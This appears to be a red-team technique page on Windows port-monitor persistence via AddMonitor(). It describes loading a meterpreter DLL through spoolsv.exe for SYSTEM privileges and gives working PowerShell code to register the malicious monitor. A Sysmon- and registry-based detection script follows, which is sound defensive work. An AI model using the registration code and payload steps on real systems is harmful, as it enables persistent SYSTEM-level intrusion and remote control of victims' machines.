AddMonitor()
Persistence, Privilege Escalation
Execution
Generating a 64-bit meterpreter payload as a DLL that spoolsv.exe will load once it is registered as a port monitor:
attacker@local
Writing and compiling a simple C++ program that registers the port monitor via AddMonitor():
monitor.cpp
Move evil64.dll to %systemroot% and execute the compiled monitor.cpp from an elevated context: AddMonitor() requires SeLoadDriverPrivilege, and because the DLL is loaded by spoolsv.exe (running as SYSTEM), the technique provides both persistence and administrator-to-SYSTEM privilege escalation.
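The same registration step done from PowerShell, as an added example that is not the page's monitor.cpp: it calls the Win32 AddMonitor() API through P/Invoke, maps the common failure codes, verifies the registry key the spooler persists the monitor under, and offers a DeleteMonitor() cleanup. The monitor name 'evilmonitor' is a placeholder, and the DLL is assumed to already sit in %SystemRoot% as described above.

```powershell
# Added example, not the page's monitor.cpp: register a print port monitor through
# the Win32 AddMonitor API from PowerShell, check the result, and clean up with
# DeleteMonitor. Assumptions: the DLL is already in %SystemRoot% (or System32),
# and the monitor name 'evilmonitor' is a placeholder. Run elevated: AddMonitor
# requires SeLoadDriverPrivilege and otherwise fails with ERROR_PRIVILEGE_NOT_HELD.

$WinspoolSignature = @"
using System;
using System.Runtime.InteropServices;

public static class Winspool
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct MONITOR_INFO_2
    {
        public string pName;        // monitor name shown under Print\Monitors
        public string pEnvironment; // e.g. "Windows x64"
        public string pDLLName;     // DLL spoolsv.exe will load
    }

    [DllImport("winspool.drv", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool AddMonitor(string pName, uint Level, ref MONITOR_INFO_2 pMonitors);

    [DllImport("winspool.drv", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool DeleteMonitor(string pName, string pEnvironment, string pMonitorName);
}
"@
Add-Type -TypeDefinition $WinspoolSignature

function Register-PortMonitor {
    param(
        [Parameter(Mandatory)][string]$MonitorName,
        [Parameter(Mandatory)][string]$DllName,
        [string]$Environment = 'Windows x64'
    )
    $info = [Winspool+MONITOR_INFO_2]::new()
    $info.pName        = $MonitorName
    $info.pEnvironment = $Environment
    $info.pDLLName     = $DllName

    # Level 2 = MONITOR_INFO_2; pName = $null targets the local print server.
    if (-not [Winspool]::AddMonitor($null, 2, [ref]$info)) {
        $code = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        $hint = switch ($code) {
            1314    { 'ERROR_PRIVILEGE_NOT_HELD: not elevated / no SeLoadDriverPrivilege' }
            126     { 'ERROR_MOD_NOT_FOUND: DLL not in the spooler search path' }
            3006    { 'ERROR_PRINT_MONITOR_ALREADY_INSTALLED' }
            default { 'see winerror.h' }
        }
        throw "AddMonitor failed, Win32 error $code ($hint)"
    }

    # Success is persisted here; spoolsv.exe loads the DLL now and on every
    # service start, which is the persistence this page is about.
    Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors\$MonitorName" |
        Select-Object PSChildName, Driver
}

function Unregister-PortMonitor {
    param([Parameter(Mandatory)][string]$MonitorName, [string]$Environment = 'Windows x64')
    if (-not [Winspool]::DeleteMonitor($null, $Environment, $MonitorName)) {
        throw "DeleteMonitor failed, Win32 error $([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
}

# Usage (elevated prompt, DLL already copied into %SystemRoot%):
# Register-PortMonitor -MonitorName 'evilmonitor' -DllName 'evil64.dll'
# Unregister-PortMonitor -MonitorName 'evilmonitor'
```

A non-elevated session is the usual reason this fails: the call returns FALSE with error 1314 without touching the registry, so checking the Print\Monitors key after the call is a quick way to confirm the registration actually took.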
Observations
Upon launching the compiled executable and inspecting the victim machine with procmon, we can see that evil64.dll is being accessed by spoolsv.exe:
which then spawns rundll32.exe hosting the meterpreter payload, which initiates a connection back to the attacker:
The following confirms the procmon results described above:
Sysmon command-line argument (Event ID 1) and network connection (Event ID 3) logging to the rescue:
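The detection side of the observations above, as an added example that is not the page's own code: it enumerates the Print\Monitors registry key that AddMonitor() writes to, flags monitor DLLs outside a baseline of Windows-shipped ones, and runs the spoolsv.exe -> rundll32.exe -> outbound-connection chain over Sysmon events. It goes beyond the page's command-line and network logging by also using registry (Event ID 13) and image-load (Event ID 7) events. The baseline DLL list and the sample events are constructed assumptions, not captured data.

```powershell
# Added example, not the page's own code: spot port-monitor persistence from the
# defender's side using the Print\Monitors registry key and Sysmon events
# (ID 1 process create, 3 network connect, 7 image load, 13 registry value set).
# The baseline DLL list and the sample events below are assumptions, not real data.

# Port monitor DLLs Windows ships with (baseline assumption; extend per environment).
$KnownMonitorDlls = @('localspl.dll', 'tcpmon.dll', 'usbmon.dll', 'WSDMon.dll', 'APMon.dll', 'FXSMON.DLL')

function Get-SuspiciousPortMonitors {
    # Every monitor AddMonitor registers lands here with a Driver value = DLL name.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors' | ForEach-Object {
        $dll = (Get-ItemProperty $_.PSPath).Driver
        if ($dll -and ($KnownMonitorDlls -notcontains $dll)) {
            [pscustomobject]@{ Monitor = $_.PSChildName; Driver = $dll }
        }
    }
}

function Get-SysmonEvents {
    # Live collection; flattens EventData into properties named after the Sysmon fields.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 3, 7, 13 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $o = [ordered]@{ Id = $_.Id }
            foreach ($d in $xml.Event.EventData.Data) { $o[$d.Name] = $d.'#text' }
            [pscustomobject]$o
        }
}

function Find-PortMonitorAbuse {
    param([Parameter(Mandatory)][object[]]$Events)
    $findings = @()
    # ID 13: a value written under Print\Monitors is the registration itself.
    foreach ($e in $Events | Where-Object { $_.Id -eq 13 -and $_.TargetObject -like '*\Control\Print\Monitors\*' }) {
        $findings += "registry: $($e.Image) set $($e.TargetObject) = $($e.Details)"
    }
    # ID 7: the spooler loading a DLL outside the shipped monitor set.
    foreach ($e in $Events | Where-Object { $_.Id -eq 7 -and $_.Image -like '*\spoolsv.exe' }) {
        $leaf = Split-Path $e.ImageLoaded -Leaf
        if ($KnownMonitorDlls -notcontains $leaf) { $findings += "imageload: spoolsv.exe loaded $($e.ImageLoaded)" }
    }
    # ID 1: children of spoolsv.exe; rundll32.exe is the payload host the page observes.
    $children = @($Events | Where-Object { $_.Id -eq 1 -and $_.ParentImage -like '*\spoolsv.exe' })
    foreach ($e in $children) { $findings += "process: spoolsv.exe spawned $($e.CommandLine)" }
    # ID 3: outbound connections from those children, joined on ProcessGuid.
    $childGuids = @($children | ForEach-Object { $_.ProcessGuid })
    foreach ($e in $Events | Where-Object { $_.Id -eq 3 -and $childGuids -contains $_.ProcessGuid }) {
        $findings += "network: $($e.Image) -> $($e.DestinationIp):$($e.DestinationPort)"
    }
    $findings
}

# Constructed sample events mirroring the page's observations (not real log data).
$SampleEvents = @(
    [pscustomobject]@{ Id = 13; Image = 'C:\Windows\System32\spoolsv.exe'; TargetObject = 'HKLM\System\CurrentControlSet\Control\Print\Monitors\evilmonitor\Driver'; Details = 'evil64.dll' },
    [pscustomobject]@{ Id = 7;  Image = 'C:\Windows\System32\spoolsv.exe'; ImageLoaded = 'C:\Windows\evil64.dll' },
    [pscustomobject]@{ Id = 1;  Image = 'C:\Windows\System32\rundll32.exe'; ParentImage = 'C:\Windows\System32\spoolsv.exe'; CommandLine = 'rundll32.exe'; ProcessGuid = '{11111111-2222-3333-4444-555555555555}' },
    [pscustomobject]@{ Id = 3;  Image = 'C:\Windows\System32\rundll32.exe'; ProcessGuid = '{11111111-2222-3333-4444-555555555555}'; DestinationIp = '10.0.0.5'; DestinationPort = '443' },
    [pscustomobject]@{ Id = 1;  Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'notepad.exe'; ProcessGuid = '{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}' }
)

# Offline run over the constructed events; the notepad.exe event is a control and yields nothing.
Find-PortMonitorAbuse -Events $SampleEvents

# Live run on a host with Sysmon installed:
# Find-PortMonitorAbuse -Events (Get-SysmonEvents)
# Get-SuspiciousPortMonitors
```

The ProcessGuid join matters: a bare "rundll32.exe made a connection" rule is noisy, whereas a rundll32.exe whose parent is spoolsv.exe and which then talks outbound is specific to this technique. The registry check is the cheapest of the four because AddMonitor() cannot succeed without writing that key.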